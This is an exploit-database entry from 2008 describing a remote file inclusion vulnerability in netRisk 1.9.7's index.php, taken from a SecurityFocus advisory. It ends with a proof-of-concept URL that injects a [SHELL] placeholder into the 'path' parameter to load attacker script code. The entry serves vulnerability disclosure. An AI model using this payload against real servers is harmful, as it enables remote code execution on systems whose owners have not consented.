NetRisk 1.9.7 - 'index.php' Remote File Inclusion
| EKU-ID: 35994 | CVE: | OSVDB-ID: |
| Author: S.W.A.T. | Published: 2008-01-04 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 35994 | CVE: | OSVDB-ID: |
| Author: S.W.A.T. | Published: 2008-01-04 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/27136/info netRisk is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code on an affected computer with the privileges of the webserver process. This issue affects netRisk 1.9.7; other versions may also be affected. http://www.example.com/Path/index.php?path=[SHELL]